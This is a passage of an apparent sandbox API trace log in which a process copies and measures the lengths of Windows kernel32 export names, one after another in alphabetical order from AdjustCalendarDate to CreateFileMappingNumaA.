returned="AdjustCalendarDate" [0082.162] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.162] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.162] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.162] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.162] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.162] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.162] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.163] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.163] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.163] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.163] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.163] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.163] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.163] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.163] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.163] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.163] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.163] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.163] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.163] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.163] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.163] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.163] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.163] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.163] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.164] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.164] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.164] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.164] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.164] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.164] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.164] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.164] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.164] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.164] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.164] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.164] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.164] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.164] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.164] lstrlenA (lpString="BEEP") returned 4 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.164] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.164] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.164] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.165] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.165] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.165] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.165] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.165] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.165] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.165] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.165] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.165] lstrlenA (lpString="CANCELIO") returned 8 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.165] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.165] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.165] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.165] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.165] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.165] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.165] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.165] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.165] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.166] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.166] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.166] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.166] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.166] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.166] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.166] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.166] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.166] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.166] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.166] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.166] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.166] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.166] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.166] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.166] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.166] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.166] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.166] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.167] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.167] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.167] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.167] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.167] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.167] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.167] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.167] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.167] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.167] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.167] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.167] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.167] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.167] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.167] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.167] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.167] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.167] lstrlenA (lpString="COPYFILEA") returned 9 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.168] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.168] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.168] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.168] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.168] lstrlenA (lpString="COPYFILEW") returned 9 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.168] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.168] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.168] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.168] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.168] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.168] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.168] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.168] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.168] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.168] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.168] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.168] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.168] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.169] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.169] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.169] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.169] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.169] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.169] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.169] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.169] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 